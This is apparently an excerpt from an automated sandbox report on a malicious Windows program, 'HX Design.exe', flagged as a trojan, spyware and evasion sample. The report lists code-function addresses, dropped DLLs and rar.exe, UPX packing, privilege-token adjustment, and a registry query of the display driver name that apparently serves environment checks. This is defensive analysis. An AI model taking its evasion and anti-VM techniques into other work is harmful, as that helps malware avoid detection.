Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe	Code function: 73_2_00007FF77D203030	73_2_00007FF77D203030
Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe	Code function: 73_2_00007FF77D220074	73_2_00007FF77D220074
Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe	Code function: 73_2_00007FF77D21C05C	73_2_00007FF77D21C05C
Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe	Code function: 73_2_00007FF77D210104	73_2_00007FF77D210104
Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe	Code function: 73_2_00007FF77D2500F0	73_2_00007FF77D2500F0
Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe	Code function: 73_2_00007FF77D225F4C	73_2_00007FF77D225F4C
Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe	Code function: 73_2_00007FF77D25AF90	73_2_00007FF77D25AF90
Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe	Code function: 73_2_00007FF77D22C00C	73_2_00007FF77D22C00C
Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe	Code function: 73_2_00007FF77D234FE8	73_2_00007FF77D234FE8
Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe	Code function: 73_2_00007FF77D25DFD8	73_2_00007FF77D25DFD8
Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe	Code function: 73_2_00007FF77D22FA6C	73_2_00007FF77D22FA6C
Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe	Code function: 73_2_00007FF77D235A70	73_2_00007FF77D235A70
Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe	Code function: 73_2_00007FF77D25AAC0	73_2_00007FF77D25AAC0
Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe	Code function: 73_2_00007FF77D1FCB14	73_2_00007FF77D1FCB14
Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe	Code function: 73_2_00007FF77D22D91C	73_2_00007FF77D22D91C
Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe	Code function: 73_2_00007FF77D21D97C	73_2_00007FF77D21D97C
Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe	Code function: 73_2_00007FF77D1F49B8	73_2_00007FF77D1F49B8
Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe	Code function: 73_2_00007FF77D2369FD	73_2_00007FF77D2369FD
Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe	Code function: 73_2_00007FF77D208C30	73_2_00007FF77D208C30
Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe	Code function: 73_2_00007FF77D235C8C	73_2_00007FF77D235C8C
Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe	Code function: 73_2_00007FF77D1FDD04	73_2_00007FF77D1FDD04
Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe	Code function: 73_2_00007FF77D219D0C	73_2_00007FF77D219D0C
Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe	Code function: 73_2_00007FF77D246D0C	73_2_00007FF77D246D0C
Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe	Code function: 73_2_00007FF77D234B38	73_2_00007FF77D234B38
Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe	Code function: 73_2_00007FF77D249B98	73_2_00007FF77D249B98
Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe	Code function: 73_2_00007FF77D247660	73_2_00007FF77D247660
Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe	Code function: 73_2_00007FF77D2586D4	73_2_00007FF77D2586D4
Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe	Code function: 73_2_00007FF77D2086C4	73_2_00007FF77D2086C4
Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe	Code function: 73_2_00007FF77D22A710	73_2_00007FF77D22A710
Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe	Code function: 73_2_00007FF77D230710	73_2_00007FF77D230710
Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe	Code function: 73_2_00007FF77D232700	73_2_00007FF77D232700
Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe	Code function: 73_2_00007FF77D21F5B0	73_2_00007FF77D21F5B0
Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe	Code function: 73_2_00007FF77D208598	73_2_00007FF77D208598
Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe	Code function: 73_2_00007FF77D22F59C	73_2_00007FF77D22F59C
Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe	Code function: 73_2_00007FF77D24260C	73_2_00007FF77D24260C
Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe	Code function: 73_2_00007FF77D2265FC	73_2_00007FF77D2265FC
Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe	Code function: 73_2_00007FF77D1F8884	73_2_00007FF77D1F8884
Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe	Code function: 73_2_00007FF77D202890	73_2_00007FF77D202890
Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe	Code function: 73_2_00007FF77D2418A8	73_2_00007FF77D2418A8
Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe	Code function: 73_2_00007FF77D23190C	73_2_00007FF77D23190C
Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe	Code function: 73_2_00007FF77D220904	73_2_00007FF77D220904
Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe	Code function: 73_2_00007FF77D2238E8	73_2_00007FF77D2238E8
Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe	Code function: 73_2_00007FF77D2017C8	73_2_00007FF77D2017C8
Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe	Code function: 73_2_00007FF77D2167E0	73_2_00007FF77D2167E0
Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe	Code function: 73_2_00007FF77D1FF24C	73_2_00007FF77D1FF24C
Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe	Code function: 73_2_00007FF77D217244	73_2_00007FF77D217244
Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe	Code function: 73_2_00007FF77D20E21C	73_2_00007FF77D20E21C
Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe	Code function: 73_2_00007FF77D242268	73_2_00007FF77D242268
Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe	Code function: 73_2_00007FF77D20D2C0	73_2_00007FF77D20D2C0
Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe	Code function: 73_2_00007FF77D2302A4	73_2_00007FF77D2302A4
Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe	Code function: 73_2_00007FF77D241314	73_2_00007FF77D241314
Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe	Code function: 73_2_00007FF77D1F42E0	73_2_00007FF77D1F42E0
Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe	Code function: 73_2_00007FF77D232164	73_2_00007FF77D232164
Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe	Code function: 73_2_00007FF77D2541CC	73_2_00007FF77D2541CC
Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe	Code function: 73_2_00007FF77D2381CC	73_2_00007FF77D2381CC
Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe	Code function: 73_2_00007FF77D235468	73_2_00007FF77D235468
Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe	Code function: 73_2_00007FF77D21D458	73_2_00007FF77D21D458
Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe	Code function: 73_2_00007FF77D1FA504	73_2_00007FF77D1FA504
Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe	Code function: 73_2_00007FF77D24832C	73_2_00007FF77D24832C
Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe	Code function: 73_2_00007FF77D202360	73_2_00007FF77D202360
Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe	Code function: 73_2_00007FF77D220374	73_2_00007FF77D220374
Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe	Code function: 73_2_00007FF77D21C3E0	73_2_00007FF77D21C3E0

Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe	Code function: String function: 00007FF77D2349F4 appears 53 times
Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe	Code function: String function: 00007FF77D208444 appears 48 times
Source: C:\Users\user\Desktop\HX Design.exe	Code function: String function: 00007FFDFB311E20 appears 33 times
Source: C:\Users\user\Desktop\HX Design.exe	Code function: String function: 00007FF732062910 appears 34 times
Source: C:\Users\user\Desktop\HX Design.exe	Code function: String function: 00007FFDFB2E9340 appears 136 times
Source: C:\Users\user\Desktop\HX Design.exe	Code function: String function: 00007FFDFB2EA500 appears 179 times
Source: C:\Users\user\Desktop\HX Design.exe	Code function: String function: 00007FFE0038D341 appears 830 times
Source: C:\Users\user\Desktop\HX Design.exe	Code function: String function: 00007FFE0038D32F appears 216 times
Source: C:\Users\user\Desktop\HX Design.exe	Code function: String function: 00007FFE0038DB03 appears 33 times
Source: C:\Users\user\Desktop\HX Design.exe	Code function: String function: 00007FFE0038D425 appears 33 times
Source: C:\Users\user\Desktop\HX Design.exe	Code function: String function: 00007FFE00311325 appears 357 times
Source: C:\Users\user\Desktop\HX Design.exe	Code function: String function: 00007FF732062710 appears 104 times

Source: rar.exe.0.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: unicodedata.pyd.0.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS

Source: api-ms-win-core-processenvironment-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-interlocked-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-util-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-stdio-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-processthreads-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-errorhandling-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-console-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-process-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-synch-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-timezone-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l2-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-debug-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-string-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-handle-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-synch-l1-2-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-profile-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-localization-l1-2-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-datetime-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-math-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-locale-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-time-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-fibers-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-processthreads-l1-1-1.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-utility-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-namedpipe-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-filesystem-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-rtlsupport-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-conio-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-heap-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-convert-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-runtime-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-string-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l1-2-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-memory-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-sysinfo-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-libraryloader-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-heap-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-environment-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found

Source: HX Design.exe	Binary or memory string: OriginalFilename vs HX Design.exe
Source: HX Design.exe, 00000000.00000003.1670667043.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs HX Design.exe
Source: HX Design.exe, 00000000.00000003.1672094828.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs HX Design.exe
Source: HX Design.exe, 00000000.00000003.1668959482.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_socket.pyd. vs HX Design.exe
Source: HX Design.exe, 00000000.00000003.1669052260.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_sqlite3.pyd. vs HX Design.exe
Source: HX Design.exe, 00000000.00000003.1667874865.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamevcruntime140.dllT vs HX Design.exe
Source: HX Design.exe, 00000000.00000003.1673205368.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs HX Design.exe
Source: HX Design.exe, 00000000.00000003.1669582469.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs HX Design.exe
Source: HX Design.exe, 00000000.00000003.1678769674.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameselect.pyd. vs HX Design.exe
Source: HX Design.exe, 00000000.00000003.1672433558.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs HX Design.exe
Source: HX Design.exe, 00000000.00000003.1670262264.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs HX Design.exe
Source: HX Design.exe, 00000000.00000003.1669381520.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs HX Design.exe
Source: HX Design.exe, 00000000.00000003.1669771704.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs HX Design.exe
Source: HX Design.exe, 00000000.00000003.1668871485.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_queue.pyd. vs HX Design.exe
Source: HX Design.exe, 00000000.00000003.1670483179.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs HX Design.exe
Source: HX Design.exe, 00000000.00000000.1667676995.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamecolorcpl.exej% vs HX Design.exe
Source: HX Design.exe, 00000000.00000003.1672181668.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs HX Design.exe
Source: HX Design.exe, 00000000.00000003.1669673863.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs HX Design.exe
Source: HX Design.exe, 00000000.00000003.1678932216.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamesqlite3.dll0 vs HX Design.exe
Source: HX Design.exe, 00000000.00000003.1672807365.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs HX Design.exe
Source: HX Design.exe, 00000000.00000003.1672348988.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs HX Design.exe
Source: HX Design.exe, 00000000.00000003.1668118244.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_ctypes.pyd. vs HX Design.exe
Source: HX Design.exe, 00000000.00000003.1671566567.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs HX Design.exe
Source: HX Design.exe, 00000000.00000003.1670767468.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs HX Design.exe
Source: HX Design.exe, 00000000.00000003.1671427459.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs HX Design.exe
Source: HX Design.exe, 00000000.00000003.1668746422.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_lzma.pyd. vs HX Design.exe
Source: HX Design.exe, 00000000.00000003.1669162897.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_ssl.pyd. vs HX Design.exe
Source: HX Design.exe, 00000000.00000003.1670376660.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs HX Design.exe
Source: HX Design.exe, 00000000.00000003.1672984815.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs HX Design.exe
Source: HX Design.exe, 00000000.00000003.1670069107.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs HX Design.exe
Source: HX Design.exe, 00000000.00000003.1670164178.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs HX Design.exe
Source: HX Design.exe, 00000000.00000003.1670867826.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs HX Design.exe
Source: HX Design.exe, 00000000.00000003.1671162659.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs HX Design.exe
Source: HX Design.exe, 00000000.00000003.1672530678.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs HX Design.exe
Source: HX Design.exe, 00000000.00000003.1672711559.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs HX Design.exe
Source: HX Design.exe, 00000000.00000003.1670566316.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs HX Design.exe
Source: HX Design.exe, 00000000.00000003.1680565460.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameunicodedata.pyd. vs HX Design.exe
Source: HX Design.exe, 00000000.00000003.1672623593.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs HX Design.exe
Source: HX Design.exe, 00000000.00000003.1672006597.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs HX Design.exe
Source: HX Design.exe, 00000000.00000003.1671060451.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs HX Design.exe
Source: HX Design.exe, 00000000.00000003.1669865054.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs HX Design.exe
Source: HX Design.exe, 00000000.00000003.1671342461.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs HX Design.exe
Source: HX Design.exe, 00000000.00000003.1668028713.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_bz2.pyd. vs HX Design.exe
Source: HX Design.exe, 00000000.00000003.1669477724.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs HX Design.exe
Source: HX Design.exe, 00000000.00000003.1668653035.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_hashlib.pyd. vs HX Design.exe
Source: HX Design.exe, 00000000.00000003.1669963061.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs HX Design.exe
Source: HX Design.exe, 00000000.00000003.1671253398.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs HX Design.exe
Source: HX Design.exe, 00000000.00000003.1669276073.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs HX Design.exe
Source: HX Design.exe, 00000000.00000003.1672894743.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs HX Design.exe
Source: HX Design.exe, 00000000.00000003.1679525523.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameucrtbase.dllj% vs HX Design.exe
Source: HX Design.exe, 00000000.00000003.1676435371.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamelibsslH vs HX Design.exe
Source: HX Design.exe, 00000000.00000003.1672257497.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs HX Design.exe
Source: HX Design.exe, 00000000.00000003.1668492693.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_decimal.pyd. vs HX Design.exe
Source: HX Design.exe, 00000000.00000003.1670955519.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs HX Design.exe
Source: HX Design.exe, 00000000.00000003.1671919991.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs HX Design.exe
Source: HX Design.exe, 00000000.00000003.1673117684.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs HX Design.exe
Source: HX Design.exe	Binary or memory string: OriginalFilename vs HX Design.exe
Source: HX Design.exe, 00000001.00000002.2111777283.00007FFE130CC000.00000004.00000001.01000000.0000000E.sdmp	Binary or memory string: OriginalFilenameselect.pyd. vs HX Design.exe
Source: HX Design.exe, 00000001.00000002.2110274532.00007FFE1026A000.00000004.00000001.01000000.00000009.sdmp	Binary or memory string: OriginalFilename_lzma.pyd. vs HX Design.exe
Source: HX Design.exe, 00000001.00000002.2113209650.00007FFE1A46A000.00000002.00000001.01000000.00000006.sdmp	Binary or memory string: OriginalFilenamevcruntime140.dllT vs HX Design.exe
Source: HX Design.exe, 00000001.00000002.2110572215.00007FFE10313000.00000004.00000001.01000000.00000012.sdmp	Binary or memory string: OriginalFilename_hashlib.pyd. vs HX Design.exe
Source: HX Design.exe, 00000001.00000002.2106731063.00007FFDFB45C000.00000004.00000001.01000000.0000000C.sdmp	Binary or memory string: OriginalFilenamesqlite3.dll0 vs HX Design.exe
Source: HX Design.exe, 00000001.00000002.2111512899.00007FFE12E1C000.00000004.00000001.01000000.00000013.sdmp	Binary or memory string: OriginalFilename_queue.pyd. vs HX Design.exe
Source: HX Design.exe, 00000001.00000002.2112595891.00007FFE13318000.00000004.00000001.01000000.0000000A.sdmp	Binary or memory string: OriginalFilename_bz2.pyd. vs HX Design.exe
Source: HX Design.exe, 00000001.00000002.2109662919.00007FFE0E183000.00000004.00000001.01000000.0000000F.sdmp	Binary or memory string: OriginalFilename_ssl.pyd. vs HX Design.exe
Source: HX Design.exe, 00000001.00000002.2106274168.00007FFDFB2AA000.00000004.00000001.01000000.00000010.sdmp	Binary or memory string: OriginalFilenamelibcryptoH vs HX Design.exe
Source: HX Design.exe, 00000001.00000002.2110927922.00007FFE11526000.00000004.00000001.01000000.00000007.sdmp	Binary or memory string: OriginalFilename_ctypes.pyd. vs HX Design.exe
Source: HX Design.exe, 00000001.00000002.2104654670.00007FFDFAD92000.00000004.00000001.01000000.00000016.sdmp	Binary or memory string: OriginalFilenameunicodedata.pyd. vs HX Design.exe
Source: HX Design.exe, 00000001.00000002.2108964263.00007FFE01462000.00000002.00000001.01000000.00000004.sdmp	Binary or memory string: OriginalFilenameucrtbase.dllj% vs HX Design.exe
Source: HX Design.exe, 00000001.00000002.2109960714.00007FFE0EB64000.00000004.00000001.01000000.0000000B.sdmp	Binary or memory string: OriginalFilename_sqlite3.pyd. vs HX Design.exe
Source: HX Design.exe, 00000001.00000002.2108069571.00007FFDFBAB5000.00000004.00000001.01000000.00000005.sdmp	Binary or memory string: OriginalFilenamepython313.dll. vs HX Design.exe
Source: HX Design.exe, 00000001.00000002.2112149178.00007FFE13218000.00000004.00000001.01000000.0000000D.sdmp	Binary or memory string: OriginalFilename_socket.pyd. vs HX Design.exe
Source: HX Design.exe, 00000001.00000002.2108558516.00007FFE003D9000.00000004.00000001.01000000.00000011.sdmp	Binary or memory string: OriginalFilenamelibsslH vs HX Design.exe
Source: HX Design.exe, 00000001.00000000.1681341710.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamecolorcpl.exej% vs HX Design.exe

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2

Source: C:\Users\user\Desktop\HX Design.exe	Process created: Commandline size = 3647
Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 3615
Source: C:\Users\user\Desktop\HX Design.exe	Process created: Commandline size = 3647	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 3615

Source: libcrypto-3.dll.0.dr	Static PE information: Section: UPX1 ZLIB complexity 0.9991990186771459
Source: libssl-3.dll.0.dr	Static PE information: Section: UPX1 ZLIB complexity 0.9923211348684211
Source: python313.dll.0.dr	Static PE information: Section: UPX1 ZLIB complexity 0.9994153529876473
Source: sqlite3.dll.0.dr	Static PE information: Section: UPX1 ZLIB complexity 0.9975483390549273
Source: unicodedata.pyd.0.dr	Static PE information: Section: UPX1 ZLIB complexity 0.9926987474437627

Source: classification engine

Classification label: mal100.troj.adwa.spyw.expl.evad.winEXE@153/109@5/4

Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe

Code function: 73_2_00007FF77D20CAFC GetLastError,FormatMessageW,

73_2_00007FF77D20CAFC

Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe	Code function: 73_2_00007FF77D20EF50 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,		73_2_00007FF77D20EF50
Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe	Code function: 73_2_00007FF77D23B57C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitWindowsEx,		73_2_00007FF77D23B57C

Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe

Code function: 73_2_00007FF77D213144 GetDiskFreeSpaceExW,

73_2_00007FF77D213144

Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

File created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\chrome_debug.log

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1456:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5352:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4812:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7556:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7648:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4460:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6048:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8096:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7604:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:1460:120:WilError_03
